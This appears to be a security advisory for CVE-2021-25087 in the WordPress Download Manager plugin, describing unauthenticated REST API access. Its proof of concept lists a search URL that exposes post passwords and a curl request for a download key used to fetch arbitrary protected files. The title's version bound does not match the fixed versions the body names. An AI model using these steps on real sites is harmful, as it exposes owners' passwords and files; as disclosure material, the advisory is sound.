Wordpress Download Manager < 3.2.35 – Sensitive Information Disclosure | CVE 2021-25087

Description

The plugin does not have any authorisation checks in some of the REST API endpoints, allowing unauthenticated attackers to call them, which could lead to sensitive information disclosure, such as posts passwords (fixed in 3.2.24) and files Master Keys (fixed in 3.2.25).

Proof of Concept

Expose plaintext passwords (fixed in 3.2.24):

- Add a new file and password protect the post from the "publish" box.
- Got to https://example.com/wp-json/wpdm/search and notice that the password is exposed in plaintext to unauthenticated users.

Bypass authentication to download files (fixed in 3.2.25):
- Obtain a download key (_wpdmkey ) with curl --data "" https://example.com/wp-json/wpdm/validate-password
- Use it to download arbitrary files by tampering with the wpdmdl parameter, ie: https://example.com/wp-json/wpdm/validate-password?wpdmdl=42&_wpdmkey=XXX